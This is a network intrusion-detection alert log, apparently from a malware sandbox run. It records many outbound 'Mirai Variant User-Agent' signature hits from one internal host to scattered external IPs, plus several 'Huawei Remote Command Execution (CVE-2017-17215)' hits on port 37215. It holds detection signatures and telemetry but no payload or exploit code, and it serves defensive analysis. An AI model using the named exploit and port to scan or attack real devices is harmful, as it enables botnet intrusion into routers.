ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.80.190.166

Timestamp:	192.168.2.2388.80.190.16659818802839471 11/22/23-08:38:50.615815
SID:	2839471
Source Port:	59818
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.116.156.78

Timestamp:	192.168.2.2388.116.156.7847866802839471 11/22/23-08:40:01.783128
SID:	2839471
Source Port:	47866
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.86.79.209

Timestamp:	192.168.2.2395.86.79.20945960802839471 11/22/23-08:40:28.946483
SID:	2839471
Source Port:	45960
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.126.68.220

Timestamp:	192.168.2.23112.126.68.22039390802839471 11/22/23-08:39:25.697817
SID:	2839471
Source Port:	39390
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.99.88.202

Timestamp:	192.168.2.2388.99.88.20256722802839471 11/22/23-08:39:47.996403
SID:	2839471
Source Port:	56722
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.178.249.43

Timestamp:	192.168.2.2388.178.249.4358080802839471 11/22/23-08:39:30.191762
SID:	2839471
Source Port:	58080
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.217.85.34

Timestamp:	192.168.2.2395.217.85.3452566802839471 11/22/23-08:37:50.622884
SID:	2839471
Source Port:	52566
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.74.95.130

Timestamp:	192.168.2.23112.74.95.13044266802839471 11/22/23-08:38:11.398847
SID:	2839471
Source Port:	44266
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.126.231.224

Timestamp:	192.168.2.23112.126.231.22432898802839471 11/22/23-08:38:29.850696
SID:	2839471
Source Port:	32898
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.46.49.148

Timestamp:	192.168.2.23112.46.49.14834728802839471 11/22/23-08:38:13.291656
SID:	2839471
Source Port:	34728
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.208.197.207

Timestamp:	192.168.2.2388.208.197.20749210802839471 11/22/23-08:40:16.872739
SID:	2839471
Source Port:	49210
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 41.239.75.245

Timestamp:	192.168.2.2341.239.75.24534908372152829579 11/22/23-08:39:28.883760
SID:	2829579
Source Port:	34908
Destination Port:	37215
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.126.169.117

Timestamp:	192.168.2.23112.126.169.11736624802839471 11/22/23-08:38:39.122241
SID:	2839471
Source Port:	36624
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.237.122.194

Timestamp:	192.168.2.2388.237.122.19435218802839471 11/22/23-08:39:06.957682
SID:	2839471
Source Port:	35218
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.100.245.112

Timestamp:	192.168.2.2395.100.245.11254266802839471 11/22/23-08:38:24.732819
SID:	2839471
Source Port:	54266
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.110.164.138

Timestamp:	192.168.2.2395.110.164.13838012802839471 11/22/23-08:38:58.798649
SID:	2839471
Source Port:	38012
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.25.90.160

Timestamp:	192.168.2.23112.25.90.16048118802839471 11/22/23-08:40:26.613096
SID:	2839471
Source Port:	48118
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.101.225.37

Timestamp:	192.168.2.2395.101.225.3755318802839471 11/22/23-08:40:10.663033
SID:	2839471
Source Port:	55318
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.101.219.246

Timestamp:	192.168.2.2395.101.219.24634344802839471 11/22/23-08:39:09.713208
SID:	2839471
Source Port:	34344
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.217.105.158

Timestamp:	192.168.2.2395.217.105.15856396802839471 11/22/23-08:40:04.851468
SID:	2839471
Source Port:	56396
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.126.178.233

Timestamp:	192.168.2.23112.126.178.23358212802839471 11/22/23-08:39:39.354619
SID:	2839471
Source Port:	58212
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.168.157.113

Timestamp:	192.168.2.23112.168.157.11351222802839471 11/22/23-08:40:26.519287
SID:	2839471
Source Port:	51222
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.48.136.70

Timestamp:	192.168.2.23112.48.136.7050182802839471 11/22/23-08:40:00.579221
SID:	2839471
Source Port:	50182
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.147.94.180

Timestamp:	192.168.2.2388.147.94.18046354802839471 11/22/23-08:40:01.791558
SID:	2839471
Source Port:	46354
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.86.197.122

Timestamp:	192.168.2.2395.86.197.12253568802839471 11/22/23-08:38:19.636162
SID:	2839471
Source Port:	53568
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.126.151.133

Timestamp:	192.168.2.23112.126.151.13354714802839471 11/22/23-08:38:46.231448
SID:	2839471
Source Port:	54714
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.100.115.15

Timestamp:	192.168.2.2395.100.115.1559134802839471 11/22/23-08:38:17.557693
SID:	2839471
Source Port:	59134
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.101.143.134

Timestamp:	192.168.2.2395.101.143.13448978802839471 11/22/23-08:40:04.481985
SID:	2839471
Source Port:	48978
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.74.188.186

Timestamp:	192.168.2.23112.74.188.18650242802839471 11/22/23-08:38:39.142495
SID:	2839471
Source Port:	50242
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.135.221.135

Timestamp:	192.168.2.23112.135.221.13555902802839471 11/22/23-08:39:01.466941
SID:	2839471
Source Port:	55902
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.87.94.98

Timestamp:	192.168.2.2388.87.94.9856890802839471 11/22/23-08:40:10.015303
SID:	2839471
Source Port:	56890
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.3.25.43

Timestamp:	192.168.2.23112.3.25.4340568802839471 11/22/23-08:39:35.002913
SID:	2839471
Source Port:	40568
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.179.146.105

Timestamp:	192.168.2.2395.179.146.10547998802839471 11/22/23-08:38:19.586883
SID:	2839471
Source Port:	47998
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.124.215.13

Timestamp:	192.168.2.23112.124.215.1356224802839471 11/22/23-08:37:59.868355
SID:	2839471
Source Port:	56224
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.125.209.236

Timestamp:	192.168.2.23112.125.209.23649276802839471 11/22/23-08:40:30.811258
SID:	2839471
Source Port:	49276
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.126.72.141

Timestamp:	192.168.2.23112.126.72.14149254802839471 11/22/23-08:37:59.865507
SID:	2839471
Source Port:	49254
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.151.46.206

Timestamp:	192.168.2.23112.151.46.20643262802839471 11/22/23-08:40:01.271370
SID:	2839471
Source Port:	43262
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.66.130.204

Timestamp:	192.168.2.2395.66.130.20452974802839471 11/22/23-08:38:00.066287
SID:	2839471
Source Port:	52974
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.213.98.136

Timestamp:	192.168.2.23112.213.98.13635426802839471 11/22/23-08:39:47.826126
SID:	2839471
Source Port:	35426
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.125.195.43

Timestamp:	192.168.2.23112.125.195.4351742802839471 11/22/23-08:38:22.233953
SID:	2839471
Source Port:	51742
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.114.206.22

Timestamp:	192.168.2.2388.114.206.2247994802839471 11/22/23-08:40:18.745961
SID:	2839471
Source Port:	47994
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.74.190.107

Timestamp:	192.168.2.23112.74.190.10735438802839471 11/22/23-08:39:40.691805
SID:	2839471
Source Port:	35438
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.101.190.7

Timestamp:	192.168.2.2395.101.190.758064802839471 11/22/23-08:38:30.026964
SID:	2839471
Source Port:	58064
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.221.37.98

Timestamp:	192.168.2.2388.221.37.9848434802839471 11/22/23-08:40:21.840850
SID:	2839471
Source Port:	48434
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.125.169.25

Timestamp:	192.168.2.23112.125.169.2553834802839471 11/22/23-08:38:48.255983
SID:	2839471
Source Port:	53834
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.221.4.64

Timestamp:	192.168.2.2388.221.4.6450526802839471 11/22/23-08:39:14.679114
SID:	2839471
Source Port:	50526
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.222.225.23

Timestamp:	192.168.2.23112.222.225.2340434802839471 11/22/23-08:38:48.860354
SID:	2839471
Source Port:	40434
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.221.16.67

Timestamp:	192.168.2.2388.221.16.6753016802839471 11/22/23-08:38:26.491841
SID:	2839471
Source Port:	53016
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.170.72.98

Timestamp:	192.168.2.2395.170.72.9842606802839471 11/22/23-08:38:58.076212
SID:	2839471
Source Port:	42606
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.186.187.244

Timestamp:	192.168.2.23112.186.187.24445096802839471 11/22/23-08:37:59.848525
SID:	2839471
Source Port:	45096
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.156.253.251

Timestamp:	192.168.2.23112.156.253.25145822802839471 11/22/23-08:38:29.841252
SID:	2839471
Source Port:	45822
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.86.202.32

Timestamp:	192.168.2.2388.86.202.3240488802839471 11/22/23-08:40:24.899263
SID:	2839471
Source Port:	40488
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.166.156.134

Timestamp:	192.168.2.23112.166.156.13459230802839471 11/22/23-08:38:15.705178
SID:	2839471
Source Port:	59230
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.101.167.189

Timestamp:	192.168.2.2395.101.167.18944690802839471 11/22/23-08:38:24.926461
SID:	2839471
Source Port:	44690
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.221.231.244

Timestamp:	192.168.2.2388.221.231.24438340802839471 11/22/23-08:38:03.499480
SID:	2839471
Source Port:	38340
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.99.203.254

Timestamp:	192.168.2.2388.99.203.25454544802839471 11/22/23-08:39:06.716523
SID:	2839471
Source Port:	54544
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.249.182.163

Timestamp:	192.168.2.2388.249.182.16338218802839471 11/22/23-08:40:18.777805
SID:	2839471
Source Port:	38218
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.198.211.227

Timestamp:	192.168.2.2388.198.211.22754600802839471 11/22/23-08:40:04.308999
SID:	2839471
Source Port:	54600
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.228.99.167

Timestamp:	192.168.2.2388.228.99.16742412802839471 11/22/23-08:39:29.451182
SID:	2839471
Source Port:	42412
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.221.247.212

Timestamp:	192.168.2.2388.221.247.21257394802839471 11/22/23-08:38:38.467008
SID:	2839471
Source Port:	57394
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.125.210.220

Timestamp:	192.168.2.23112.125.210.22040100802839471 11/22/23-08:38:48.256576
SID:	2839471
Source Port:	40100
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.10.80.250

Timestamp:	192.168.2.2395.10.80.25048742802839471 11/22/23-08:39:09.756980
SID:	2839471
Source Port:	48742
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.87.10.67

Timestamp:	192.168.2.2388.87.10.6734596802839471 11/22/23-08:39:32.823483
SID:	2839471
Source Port:	34596
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.210.101.108

Timestamp:	192.168.2.2388.210.101.10836970802839471 11/22/23-08:38:02.088586
SID:	2839471
Source Port:	36970
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.58.246.128

Timestamp:	192.168.2.2395.58.246.12859824802839471 11/22/23-08:39:23.683019
SID:	2839471
Source Port:	59824
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 41.34.202.189

Timestamp:	192.168.2.2341.34.202.18946134372152829579 11/22/23-08:38:13.131600
SID:	2829579
Source Port:	46134
Destination Port:	37215
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.198.237.24

Timestamp:	192.168.2.2388.198.237.2440666802839471 11/22/23-08:38:35.244983
SID:	2839471
Source Port:	40666
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.213.252.227

Timestamp:	192.168.2.2395.213.252.22760534802839471 11/22/23-08:38:45.358568
SID:	2839471
Source Port:	60534
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.100.244.192

Timestamp:	192.168.2.2395.100.244.19235474802839471 11/22/23-08:39:36.582702
SID:	2839471
Source Port:	35474
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.163.120.132

Timestamp:	192.168.2.2395.163.120.13240730802839471 11/22/23-08:39:49.498559
SID:	2839471
Source Port:	40730
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.179.60.253

Timestamp:	192.168.2.23112.179.60.25344984802839471 11/22/23-08:38:57.087487
SID:	2839471
Source Port:	44984
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.43.244.23

Timestamp:	192.168.2.2395.43.244.2335898802839471 11/22/23-08:38:58.810096
SID:	2839471
Source Port:	35898
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.214.194.206

Timestamp:	192.168.2.2388.214.194.20635136802839471 11/22/23-08:40:21.623603
SID:	2839471
Source Port:	35136
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.173.137.55

Timestamp:	192.168.2.2395.173.137.5552898802839471 11/22/23-08:40:27.046260
SID:	2839471
Source Port:	52898
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 197.0.96.197

Timestamp:	192.168.2.23197.0.96.19741388372152829579 11/22/23-08:40:28.467238
SID:	2829579
Source Port:	41388
Destination Port:	37215
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.171.240.247

Timestamp:	192.168.2.23112.171.240.24759038802839471 11/22/23-08:38:48.247355
SID:	2839471
Source Port:	59038
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.142.154.144

Timestamp:	192.168.2.2395.142.154.14453376802839471 11/22/23-08:38:40.840549
SID:	2839471
Source Port:	53376
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.74.49.41

Timestamp:	192.168.2.23112.74.49.4158740802839471 11/22/23-08:38:18.074774
SID:	2839471
Source Port:	58740
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.163.97.122

Timestamp:	192.168.2.2395.163.97.12240200802839471 11/22/23-08:40:11.064618
SID:	2839471
Source Port:	40200
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.198.66.59

Timestamp:	192.168.2.2388.198.66.5960400802839471 11/22/23-08:40:21.711242
SID:	2839471
Source Port:	60400
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.217.222.218

Timestamp:	192.168.2.2395.217.222.21839440802839471 11/22/23-08:38:08.641947
SID:	2839471
Source Port:	39440
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.86.79.128

Timestamp:	192.168.2.2395.86.79.12840192802839471 11/22/23-08:40:00.032797
SID:	2839471
Source Port:	40192
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.87.6.45

Timestamp:	192.168.2.2388.87.6.4535290802839471 11/22/23-08:38:50.677174
SID:	2839471
Source Port:	35290
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.125.254.62

Timestamp:	192.168.2.23112.125.254.6258304802839471 11/22/23-08:38:46.219570
SID:	2839471
Source Port:	58304
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.100.219.220

Timestamp:	192.168.2.2395.100.219.22051054802839471 11/22/23-08:40:10.142581
SID:	2839471
Source Port:	51054
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.216.12.103

Timestamp:	192.168.2.2395.216.12.10338380802839471 11/22/23-08:40:04.852923
SID:	2839471
Source Port:	38380
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.3.25.43

Timestamp:	192.168.2.23112.3.25.4340566802839471 11/22/23-08:39:34.996356
SID:	2839471
Source Port:	40566
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.171.21.188

Timestamp:	192.168.2.2395.171.21.18852314802839471 11/22/23-08:39:49.702446
SID:	2839471
Source Port:	52314
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.101.179.134

Timestamp:	192.168.2.2395.101.179.13446408802839471 11/22/23-08:40:18.579503
SID:	2839471
Source Port:	46408
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 41.239.72.250

Timestamp:	192.168.2.2341.239.72.25041458372152829579 11/22/23-08:39:02.196658
SID:	2829579
Source Port:	41458
Destination Port:	37215
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.101.5.64

Timestamp:	192.168.2.2395.101.5.6433898802839471 11/22/23-08:40:04.675795
SID:	2839471
Source Port:	33898
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.226.53.130

Timestamp:	192.168.2.2395.226.53.13055716802839471 11/22/23-08:40:09.766199
SID:	2839471
Source Port:	55716
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.59.245.231

Timestamp:	192.168.2.2395.59.245.23135270802839471 11/22/23-08:40:09.791160
SID:	2839471
Source Port:	35270
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.90.180.9

Timestamp:	192.168.2.23112.90.180.954536802839471 11/22/23-08:40:26.547501
SID:	2839471
Source Port:	54536
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.126.78.126

Timestamp:	192.168.2.23112.126.78.12645206802839471 11/22/23-08:39:25.695376
SID:	2839471
Source Port:	45206
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.213.35.79

Timestamp:	192.168.2.23112.213.35.7937790802839471 11/22/23-08:39:39.354525
SID:	2839471
Source Port:	37790
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.46.225.207

Timestamp:	192.168.2.23112.46.225.20753078802839471 11/22/23-08:38:11.457411
SID:	2839471
Source Port:	53078
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.250.107.55

Timestamp:	192.168.2.2395.250.107.5532998802839471 11/22/23-08:39:13.989294
SID:	2839471
Source Port:	32998
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 197.56.98.195

Timestamp:	192.168.2.23197.56.98.19551374372152835222 11/22/23-08:38:35.550535
SID:	2835222
Source Port:	51374
Destination Port:	37215
Protocol:	TCP
